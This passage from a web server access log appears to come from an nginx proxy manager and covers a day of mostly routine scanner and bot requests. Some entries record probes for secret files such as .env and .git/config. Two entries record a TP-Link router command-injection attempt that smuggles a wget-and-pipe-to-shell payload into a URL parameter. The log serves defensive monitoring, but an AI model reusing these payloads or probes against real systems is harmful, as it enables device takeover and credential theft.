AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:13:19:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:13:24:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 185.253.160.148] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:13:36:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:13:41:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 152.32.250.21] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:13:41:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 152.32.250.21] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" -[16/Feb/2026:13:42:12 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[16/Feb/2026:13:42:13 +0000] 404 - GET http 222.117.41.51 "/robots.txt" [Client 152.32.250.21] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" -[16/Feb/2026:13:42:13 +0000] 404 - GET http 222.117.41.51 "/sitemap.xml" [Client 152.32.250.21] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" -[16/Feb/2026:13:42:13 +0000] 404 - GET http 222.117.41.51 "/config.json" [Client 152.32.250.21] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" -[16/Feb/2026:13:43:49 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:13:49:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:13:54:27 +0000] 200 - GET http 222.117.41.51 "/" [Client 91.109.154.126] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" -[16/Feb/2026:13:57:06 +0000] 200 - GET http 222.117.41.51 "/" [Client 20.65.193.189] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[16/Feb/2026:14:10:01 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:14:20:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:14:28:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 103.251.27.88] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" "-" -[16/Feb/2026:14:35:00 +0000] 400 - GET http 222.117.41.51 "/" [Client 52.146.90.191] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" -[16/Feb/2026:14:35:00 +0000] 400 - - http localhost "-" [Client 52.146.90.191] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:14:36:11 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:14:38:05 +0000] 400 - - http localhost "-" [Client 20.46.226.34] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:14:41:39 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:15:01:30 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:15:11:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:15:26:01 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.156.129.57] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" -[16/Feb/2026:15:27:23 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:15:36:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[16/Feb/2026:15:40:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:15:49:13 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.3.221.86] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0" "-" -[16/Feb/2026:15:51:51 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:15:54:02 +0000] 404 - GET http 222.117.41.51 "/portal/redlion" [Client 40.74.212.73] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[16/Feb/2026:16:15:13 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:16:17:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:16:34:30 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:16:40:27 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:16:54:42 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:17:04:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:17:05:46 +0000] 400 - GET http 222.117.41.51 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" -[16/Feb/2026:17:10:23 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:17:25:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:17:31:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:17:31:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:17:41:42 +0000] 200 - GET http 222.117.41.51 "/" [Client 129.226.93.214] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[16/Feb/2026:17:45:22 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[16/Feb/2026:17:45:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:17:45:23 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[16/Feb/2026:17:45:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:17:45:23 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[16/Feb/2026:17:52:32 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[16/Feb/2026:17:52:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:17:52:33 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[16/Feb/2026:17:52:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:17:52:35 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[16/Feb/2026:17:55:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 34.76.139.101] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" -[16/Feb/2026:17:59:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:18:00:07 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:18:22:45 +0000] 404 - GET http 222.117.41.51 "/dispatch.asp" [Client 195.3.221.86] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:18:26:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:18:32:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:18:32:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 185.242.226.110] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:18:39:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 85.217.149.38] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:18:45:20 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[16/Feb/2026:18:52:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:18:53:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:19:18:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:19:19:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.166.244.192] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[16/Feb/2026:19:20:47 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:19:28:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:19:42:06 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:19:42:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:19:55:06 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:20:02:18 +0000] 404 - GET http 222.117.41.51 "/manager/text/list" [Client 20.169.105.85] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[16/Feb/2026:20:07:05 +0000] 404 - GET http 222.117.41.51 "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh)" [Client 221.159.119.6] [Length 150] [Gzip -] "-" "-" -[16/Feb/2026:20:07:05 +0000] 404 - GET http 222.117.41.51 "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh)" [Client 221.159.119.6] [Length 150] [Gzip -] "-" "-" -[16/Feb/2026:20:10:51 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:20:19:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:20:23:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 104.192.2.62] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:20:23:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 104.192.2.62] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:20:23:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 104.192.2.62] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:20:32:13 +0000] 400 - GET http 222.117.41.51 "/" [Client 167.94.138.32] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[16/Feb/2026:20:32:17 +0000] 400 - - http localhost "-" [Client 167.94.138.32] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:20:32:26 +0000] 400 - GET http 222.117.41.51 "/robots.txt" [Client 167.94.138.32] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[16/Feb/2026:20:33:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:20:34:09 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[16/Feb/2026:20:34:10 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[16/Feb/2026:20:34:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:20:34:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:20:34:11 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[16/Feb/2026:20:40:18 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[16/Feb/2026:20:40:19 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[16/Feb/2026:20:40:19 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:20:42:10 +0000] 404 - GET http 222.117.41.51 "/.git/config" [Client 195.178.110.162] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" -[16/Feb/2026:20:45:41 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:21:00:55 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:21:16:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:21:17:55 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[16/Feb/2026:21:24:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:21:33:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:21:37:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 197.245.24.60] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-" -[16/Feb/2026:21:42:04 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:21:50:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:22:12:00 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.178.110.245] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[16/Feb/2026:22:15:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:22:17:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:22:21:11 +0000] 200 - GET http 222.117.41.51 "/" [Client 176.65.139.8] [Length 1033] [Gzip -] "-" "-" -[16/Feb/2026:22:31:29 +0000] 404 - GET http 222.117.41.51 "/admin/config.php" [Client 102.22.20.125] [Length 150] [Gzip -] "xfa1,nvdorz,nvd0rz" "-" -[16/Feb/2026:22:34:55 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:22:38:55 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:22:40:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:22:42:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:22:47:09 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" "-" -[16/Feb/2026:23:05:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:23:25:06 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:23:28:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:23:30:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:23:32:05 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:23:39:10 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[16/Feb/2026:23:56:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:23:58:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.135.193.11] [Length 1033] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:23:58:43 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:23:58:43 +0000] 404 - GET http 222.117.41.51 "/.env.local" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 